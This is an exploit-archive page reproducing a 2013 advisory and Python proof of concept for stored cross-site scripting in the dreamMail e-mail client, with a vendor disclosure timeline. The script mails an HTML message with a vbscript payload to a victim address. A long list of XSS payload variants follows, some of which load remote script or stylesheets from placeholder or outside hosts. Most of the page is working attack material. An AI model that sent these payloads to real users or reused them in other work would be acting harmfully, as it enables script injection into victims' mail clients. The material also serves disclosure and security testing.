Home / exploitsPDF  

DreamMail e-mail client v4.6.9.2 Stored XSS Vulnerability

Posted on 25 August 2013

<pre>#!/usr/bin/python
'''
  
Author: loneferret of Offensive Security
Product: dreamMail e-mail client
Version: 4.6.9.2
Vendor Site: http://www.dreammail.eu
Software Download: http://www.dreammail.eu/intl/en/download.html
  
Tested on: Windows XP SP3 Eng.
Tested on: Windows 7 Pro SP1 Eng.
dreamMail: Using default settings
  
  
E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you
get an annoying alert box etc etc etc.
Injection Point: Body
   
Gave vendor 7 days to reply in order to co-ordinate a release date.
Timeline:
16 Aug 2013: Tentative release date 23 Aug 2013
16 Aug 2013: Vulnerability reported to vendor. Provided complete list of payloads.
19 Aug 2013: Still no response. Sent second e-mail.
22 Aug 2013: Got a reply but not from development guy. He seems MIA according to contact.
             No longer supported due to missing development guy.
23 Aug 2013: Still nothing.
24 Aug 2013: Release
  
'''
  
import smtplib, urllib2
  
payload = '''&lt;IMG SRC='vbscript:msgbox(&quot;XSS&quot;)'&gt;'''
  
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = &quot;From: hacker@offsec.local
&quot;
        msg += &quot;To: victim@offsec.local
&quot;
        msg += 'Date: Today
'
        msg += &quot;Subject: XSS payload
&quot;
        msg += &quot;Content-type: text/html

&quot;
        msg += payload + &quot;

&quot;
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print &quot;[-] Failed to send email:&quot;
                print &quot;[*] &quot; + str(e)
        server.quit()
  
username = &quot;acker@offsec.local&quot;
password = &quot;123456&quot;
dstemail = &quot;victim@offsec.local&quot;
frmemail = &quot;acker@offsec.local&quot;
smtpsrv  = &quot;xxx.xxx.xxx.xxx&quot;
  
print &quot;[*] Sending Email&quot;
sendMail(dstemail, frmemail, smtpsrv, username, password)
  
'''
List of XSS types and different syntaxes to which the client is vulnerable.
Each payload will pop a message box, usually with the message &quot;XSS&quot; inside.
  
  
Paylaod-: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}
  
Paylaod-: &lt;SCRIPT SRC=http://server/xss.js&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  
Paylaod-: &lt;BODY BACKGROUND=&quot;javascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;BODY ONLOAD=alert('XSS')&gt;
  
Paylaod-: &lt;DIV STYLE=&quot;background-image: url(javascript:alert('XSS'))&quot;&gt;
  
Paylaod-: &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert('XSS'))&quot;&gt;
  
Paylaod-: &lt;DIV STYLE=&quot;width: expression(alert('XSS'));&quot;&gt;
  
Paylaod-: &lt;IFRAME SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/IFRAME&gt;
  
Paylaod-: &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;IMG SRC=javascript:alert('XSS')&gt;
  
Paylaod-: &lt;IMG DYNSRC=&quot;javascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;IMG LOWSRC=&quot;javascript:alert('XSS');&quot;&gt;Paylaod-: 21exp/*&lt;XSS STYLE='noxss:noxss(&quot;*//*&quot;);
xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))'&gt;
  
Paylaod-: &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  
Paylaod-: &lt;IMG SRC='vbscript:msgbox(&quot;XSS&quot;)'&gt;
  
Paylaod-: &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;
  
Paylaod-: &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert('XSS'))&quot;&gt;
  
Paylaod-: &lt;XSS STYLE=&quot;xss:expression(alert('XSS'))&quot;&gt;
  
Paylaod-: &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  
Paylaod-: &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert('XSS')&quot;)}&lt;/STYLE&gt;
  
Paylaod-: &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
  
Paylaod-: &lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
  
Paylaod-: &lt;TABLE BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TABLE&gt;
  
Paylaod-: &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  
Paylaod-: &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert('XSS');&quot;&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;
  
Paylaod-: &lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  
Paylaod-: &lt;HTML&gt;&lt;BODY&gt;
&lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&gt;
&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;
&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;alert('XSS')&lt;/SCRIPT&gt;&quot;&gt; &lt;/BODY&gt;&lt;/HTML&gt;
  
Paylaod-: &lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;
  
Paylaod-: &lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
  
Paylaod-: &lt;IMG SRC=javascript:alert(&quot;XSS&quot;)&gt;
  
Paylaod-: &lt;IMG SRC=`javascript:alert(&quot;We says, 'XSS'&quot;)`&gt;
  
Paylaod-: &lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
  
Paylaod-: &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
  
Paylaod-: &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
  
Paylaod-: &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
  
Paylaod-: &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  
Paylaod-: &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);&lt;/SCRIPT&gt;
  
Paylaod-: &lt;STYLE&gt;@import'javasc
ipt:alert(&quot;XSS&quot;)';&lt;/STYLE&gt;
  
Paylaod-: &lt;IMG SRC=&quot;jav  ascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;IMG SRC=&quot; &amp;#14;  javascript:alert('XSS');&quot;&gt;
  
Paylaod-: &lt;SCRIPT/XSS SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT SRC=http://server/xss.js
  
Paylaod-: &lt;IMG SRC=&quot;javascript:alert('XSS')&quot;
  
Paylaod-: &lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
  
Paylaod-: &lt;SCRIPT&gt;a=/XSS/
alert(a.source)&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT a=&quot;blah&quot; '' SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT &quot;a='&gt;'&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT a=`&gt;` SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
Paylaod-: &lt;SCRIPT a=&quot;&gt;'&gt;&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  
'''</pre>

 

TOP

Malware :

Exploits :